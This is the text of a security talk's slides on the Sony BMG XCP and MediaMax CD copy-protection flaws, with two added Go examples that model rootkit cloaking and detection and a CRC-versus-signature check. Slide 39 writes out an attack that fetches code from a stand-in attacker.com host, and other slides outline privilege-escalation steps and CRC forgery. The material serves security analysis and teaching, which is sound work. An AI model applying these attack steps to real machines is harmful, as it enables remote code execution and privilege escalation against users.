
Slide 1: Dangerous Tunes: Lessons from the Sony CD-DRM Episode
J. Alex Halderman and Edward W. Felten
Center for Information Technology Policy, Department of Computer Science, Princeton University

Slide 2: The “Episode” – Fall 2005
- World’s second largest music company
- Major anti-piracy plan, gone badly awry
- Millions of copies of dangerous software
- Hundreds of thousands of PCs at risk
- International protests, class-action suits
- Multi-million dollar recall, settlements
- Case study of digital rights management

Slide 3: Cast of Characters
- First4Internet (XCP): 52 titles, 4.7 million discs
- SunnComm (MediaMax, “Light years beyond encryption™”): 37 titles, 20 million discs

Slide 4: In Today’s Talk
1. How CD DRM works
2. Vulnerabilities
   - The XCP Rootkit
   - Spyware-like Behaviors
   - MediaMax Player Hole
   - Uninstaller Holes
3. Conclusions
Content protection problems → User security problems
Lessons for security and IT policy communities
Focus: Vulnerabilities for end users, not holes in content protection

Slide 5: What is CD DRM?
- CD players: plays normally
- Computers: restricted use, e.g. can’t copy disc, can’t rip as MP3, can’t use on iPod

Slide 6: Passive Protection
(Diagram: ripper/copier application, OS, drivers)
Modify data format to confuse hardware or OS

Slide 7: Active Protection
(Diagram: ripper/copier application, OS, drivers, with protection software added)
Install protection driver that breaks applications

Slide 8: Active Protection
First time protected CD is inserted…
- Autorun (normal Windows feature) executes installer from the CD
- Installs active protection driver
- Remains on system
(Diagram: protection driver added to the driver stack)

Slide 9: Active Protection
(Diagram: normal CD vs. CD marked as protected, with the protection driver between the CD driver and the application)
User tries to rip or copy a disc…
- Active protection software interposes between CD driver and app
- Checks disc — should deny access?
- If yes, introduces errors into audio

Slide 10: Defeating Active Protection
- Prevent installation
  - Infamous shift key ‘attack’ (disables autorun)
  - Turn autorun off
  - Use Linux, Mac OS, etc.
- Interfere with disc detection
- Disable or remove protection drivers

Slide 11: XCP Rootkit: Motivation
Content protection problem: Users will remove active protection software
XCP response: Actively conceal processes, files, registry keys

Slide 12: The XCP Rootkit

Slide 13: XCP Rootkit: Discovery
Mark Russinovich, October 31, 2005

Slide 14: XCP Rootkit: Operation
Normal Windows system call (list files in a directory):
KeServiceDescriptorTable:
    KeQueryDirectoryFile      0x8060bb9c
    KeCreateFile              0x8056b9c8
    KeQuerySystemInformation  0x805ca104
    KeEnumerateKey            0x805010d0
    KeOpenKey                 0x805c9e3c
    …
Application calls KeQueryDirectoryFile(…); the table entry sends it to 0x8060bb9c in the Windows kernel: int KeQueryDirectoryFile(…) { … }

Slide 15: XCP Rootkit: Operation
With the rootkit installed, the table entry is changed:
KeServiceDescriptorTable:
    KeQueryDirectoryFile      0x0f967bfa
    KeCreateFile              0x8056b9c8
    KeQuerySystemInformation  0x805ca104
    KeEnumerateKey            0x805010d0
    KeOpenKey                 0x805c9e3c
    …
Application calls KeQueryDirectoryFile(…); the table entry now sends it to 0x0f967bfa in the rootkit (Aries.sys):
    int Rootkit_QueryDirectoryFile(…) { … if filename begins with “$sys$”: remove from results … }
The original int KeQueryDirectoryFile(…) { … } remains at 0x8060bb9c in the Windows kernel.

Slide 16: XCP Rootkit: Operation
Magic prefix: $sys$ — hidden:
- Files
- Processes
- Registry keys
Exception: If calling process starts with $sys$, can see everything

Slide 17: XCP Rootkit: Problems
Local privilege escalation
- All marked files, processes, and registry keys hidden — not limited to XCP software
- Malware run by non-privileged users can’t install its own rootkit, but can utilize XCP’s
- Used to hide from virus checkers, admin tools
Exploits in wild
- Backdoor.Ryknos.B, Trojan.Welomoch
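The cloaking rule from slides 14 through 17 and the cross-view check that exposes it, as an added Go model that is not code from the talk or from XCP; the directory names are constructed, and the hook is a plain function standing in for the patched service-table entry.

```go
package main

import "strings"

const hiddenPrefix = "$sys$" // the magic prefix the talk describes

// rawListing stands in for reading the directory straight from disk, below the
// hooked system call. Constructed sample: XCP's own cloaked files plus one
// third-party file that borrows the same cloak.
var rawListing = []string{
	"$sys$aries.sys",
	"$sys$DRMServer.exe",
	"$sys$backdoor.exe", // not XCP's, hidden anyway
	"notepad.exe",
	"kernel32.dll",
}

// hookedQueryDirectory models the Aries.sys replacement for
// KeQueryDirectoryFile: strip every $sys$ entry from the results unless the
// calling process is itself $sys$-prefixed, in which case it sees everything.
func hookedQueryDirectory(caller string, dir []string) []string {
	if strings.HasPrefix(caller, hiddenPrefix) {
		return append([]string(nil), dir...)
	}
	var visible []string
	for _, name := range dir {
		if !strings.HasPrefix(name, hiddenPrefix) {
			visible = append(visible, name)
		}
	}
	return visible
}

// crossViewHidden is the detection idea (added here, not from the talk): list the
// same directory through the API and through an independent low-level read, and
// report every entry the API view omits. Names are returned in raw order.
func crossViewHidden(apiView, rawView []string) []string {
	seen := make(map[string]bool, len(apiView))
	for _, n := range apiView {
		seen[n] = true
	}
	var hidden []string
	for _, n := range rawView {
		if !seen[n] {
			hidden = append(hidden, n)
		}
	}
	return hidden
}
```

The same comparison applies to process and registry-key enumeration, which the rootkit filters by the same prefix.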

Slide 18: XCP Rootkit: Reaction
“Most people, I think, don't even know what a Rootkit is, so why should they care about it?”
— Thomas Hesse, President, Sony BMG Global Digital Business (Nov. 4)
“It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.”
— Stewart Baker, Asst. U.S. Secretary of Homeland Security (Nov. 14)
Nov. 3: Sony releases first patch to remove rootkit
Nov. 10: First class action lawsuits filed against Sony
Nov. 15: Sony recalls XCP discs

Slide 19: XCP Rootkit: Lessons
- Dangerous XCP CDs on sale for six months (~2 million discs) before rootkit revealed
- Not detected by any commercial anti-virus or anti-spyware software
- Security vendors need to better scrutinize software from major content companies (no matter how worthy their goals).

Slide 20: XCP and MediaMax Players

Slide 21: Spyware-like Behavior
Both XCP and MediaMax: “Phone home” about each album played
- Purpose: Platform monetization (sell ads)
- Vendor learns album ID, IP address
- Sometimes can link IP and email address
- Not disclosed in EULAs or privacy policies
    POST /perfectplacement/retrieveassets.asp?id=7F63A4FD-9FBD-486B-B473-D18CC92D05C0 HTTP/1.1
    Host: license.sunncomm2.com

Slide 22: Spyware-like Behavior
Both XCP and MediaMax:
- Ship without a meaningful uninstaller
- Install without consent or exceed consent
  - Both: Block access to many CDs, not just one
  - XCP: Installs undisclosed rootkit
  - MediaMax: Installs 13+ MB, even if user declines

Slide 23: CD DRM Players: Lessons
- Spyware hard to define, but certain behaviors clearly contrary to norms
- Goal: Informed consent, particularly regarding controversial behaviors

Slide 24: MediaMax Player: Motivation
Content protection problem:
- Users will decline to install active protection
- Platform building very lucrative for vendor
Incentive mismatch between vendor and label
MediaMax response: Install aggressively, regardless of consent

Slide 25: MediaMax Player: Problem

Slide 26: MediaMax Player: Problem
(Screenshot of file permissions) Everyone — Full Control
Will be reset to insecure state next time CD is inserted

Slide 27: MediaMax Player: Attack 1 (Jesse Burns and Alex Stamos)
1. Non-privileged user replaces MMX.exe with attack version
2. Privileged user plays CD
3. Attack code runs with privileges

Slide 28: MediaMax Player: Attack 2
1. Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function
2. Non-privileged user replaces installed file with attack version
3. Privileged user inserts CD
4. Even before displaying a EULA, software on CD calls MediaMax.dll code to check version
5. Attack code runs with privileges

Slide 29: MediaMax Player: Attack 2
- Sony patch for first attack checks MediaMax.dll version (avoid deactivating future DRM versions?)
- If already booby-trapped, patch will set off the attack code!
- Vulnerable even if never accepted EULA

Slide 30: MediaMax Player: Lessons
- Aggressive DRM can make other security problems harder to fix
- Vendors may take longer to fix security problems when doing so may weaken content protection

Slide 31: XCP and MediaMax Uninstallers

Slide 32: Uninstallers: Motivation
Content protection problem: Angry customers demand the ability to remove active protection software
- E.g., to resolve security problems
XCP and MediaMax response: Make uninstallers hard to get, use online design to limit who can use them

Slide 33: XCP Uninstaller: Step 1

Slide 34: XCP Uninstaller: Step 2
Wait for email (hours)

Slide 35: XCP Uninstaller: Step 3

Slide 36: XCP Uninstaller: Step 4
Wait for second email (several days)

Slide 37: XCP Uninstaller: Step 5
Finally, visit web page and run uninstaller
(But if you insert the CD again, go back to step 1!)

Slide 38: XCP Uninstaller: Operation
1. XCP Uninstall web page calls CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”)
2. Client (CodeSupport.ocx) sends “HTTP GET /XCP.dat” to server sony-bmg.com, which returns XCP.dat
3. Client extracts InstallLite.dll from XCP.dat, calls function UnInstall.xcp
Problems:
1. ActiveX control will accept arbitrary URL
2. Code from that URL is not authenticated
3. Control is not removed after use

Slide 39: XCP Uninstaller: Attack
1. Attacker constructs Evil.dat: creates InstallLite.dll and puts attack code in UninstallXCP function
2. Victim visits attacker’s web page, which calls CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”)
3. Client (CodeSupport.ocx) sends “HTTP GET /Evil.dat” to server attacker.com, which returns Evil.dat
4. Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP
Attack code runs with local user’s privileges.

Slide 40: Constructing Evil.dat
Archive files protected with proprietary CRC
Header: Name=“UninstallXCP.dat”, CRC=0x03cb1a88
ActiveX control:
1. C = ComputeCRC( )
2. If C != Header.CRC then Terminate
3. Extract and execute file
Constructing the archive:
1. Prepare Evil.dat with random CRC
2. Run with breakpoint at line 2
3. Take computed CRC and place in Evil.dat
Lesson: Use a digital signature!
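The CRC check from slide 40 beside the signature check the slide calls for, as an added Go example that is not code from the talk or from the vendor’s control; IEEE CRC-32 stands in for the proprietary CRC, the vendor key is derived from a constructed all-zero seed, and allowedSource is an assumed fix for the arbitrary-URL problem on slide 38.

```go
package main

import (
	"crypto/ed25519"
	"encoding/binary"
	"hash/crc32"
	"net/url"
	"strings"
)

// Package models the XCP.dat archive: name, integrity field, executable payload.
type Package struct {
	Name    string
	Check   []byte // CRC as XCP did it, or a signature as it should have been
	Payload []byte
}

// crcAccept mirrors the CodeSupport.ocx check: a CRC detects corruption, nothing more.
func crcAccept(p Package) bool {
	return len(p.Check) == 4 && binary.LittleEndian.Uint32(p.Check) == crc32.ChecksumIEEE(p.Payload)
}

// forgeCRC shows why: any third party can fill in a matching header CRC.
func forgeCRC(name string, payload []byte) Package {
	c := make([]byte, 4)
	binary.LittleEndian.PutUint32(c, crc32.ChecksumIEEE(payload))
	return Package{Name: name, Check: c, Payload: payload}
}

// demoKey derives the vendor key pair from a constructed all-zero seed (demo only).
func demoKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	priv := ed25519.NewKeyFromSeed(make([]byte, ed25519.SeedSize))
	return priv.Public().(ed25519.PublicKey), priv
}

// signPackage is the vendor-side step; the private key never ships in the control.
func signPackage(priv ed25519.PrivateKey, name string, payload []byte) Package {
	return Package{Name: name, Check: ed25519.Sign(priv, payload), Payload: payload}
}

// signedAccept is the corrected client check: verify against the embedded vendor key first.
func signedAccept(pub ed25519.PublicKey, p Package) bool {
	return ed25519.Verify(pub, p.Payload, p.Check)
}

// allowedSource fixes the arbitrary-URL problem: fetch only over HTTPS from the vendor host.
func allowedSource(raw, vendorHost string) bool {
	u, err := url.Parse(raw)
	return err == nil && u.Scheme == "https" && strings.EqualFold(u.Hostname(), vendorHost)
}
```

A forged archive passes crcAccept but fails signedAccept, and an archive tampered after signing fails as well; the third problem on slide 38, removing the control after use, is a deployment step outside this code.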

Slide 41: MediaMax Uninstaller
“Oops!... I did it again”

Slide 42: MediaMax Uninstaller
1. MediaMax Uninstall web page calls AxWebRemove.Remove(3984-9201-0039-2257, “http://www.sunncomm.com/validate.asp”)
2. Client (AxWebRemove.ocx) sends “GET /validate.asp?key=3984-…” to server sunncomm.com, which returns “http://sunncomm.com/webrem.dll”
3. Client sends “GET /webrem.dll” to server sunncomm.com, which returns WebRem.dll
4. Client calls function ECF7() from WebRem.dll

Slide 43: Uninstallers: Lessons
- Content security problems complicate design of software systems, inviting security problems
- Resources devoted to content security at expense of user security may allow simple vulnerabilities to slip through

Slide 44: Chronology
Oct. 31: Rootkit revealed
Nov. 3: Sony releases XCP patch
Nov. 10: First suits filed against Sony
Nov. 14: XCP patch/uninstaller hole
Nov. 15: Sony recalls XCP discs
Nov. 17: MediaMax uninstaller hole
Dec. 6: MediaMax player hole
Dec. 7: Hole in patch for MediaMax player hole
Dec. 30: First suits settled

Slide 45: Aftermath
- XCP discs recalled; MediaMax halted (but still on many store shelves)
- Major class-action suits settled
  - Customers can trade discs for cash, downloads, and non-DRM versions
- State, Federal governments still investigating
- Sony won’t use CD DRM, for now

Slide 46: Conclusions
- DRM poses threats to user security and privacy
- Security community/policymakers must be wary, despite worthy goal of protecting copyright
- Even major content vendors should be scrutinized

Slide 47: Conclusions
Efficacy of DRM can be inversely related to user’s ability to defend against security threats
- Users need to understand and control operation of the computer
- Some DRM systems rely on undermining understanding and control (XCP rootkit)

Slide 48: The Stakes are High!
Bad DRM can…
- Harm users
- Create major liability for content owners
- Reduce sales for artists
- Ultimately, reduce incentive to create

Slide 49: Dangerous Tunes: Lessons from the Sony CD-DRM Episode
J. Alex Halderman and Edward W. Felten
Center for Information Technology Policy, Department of Computer Science, Princeton University
Paper: http://itpolicy.princeton.edu/pub/

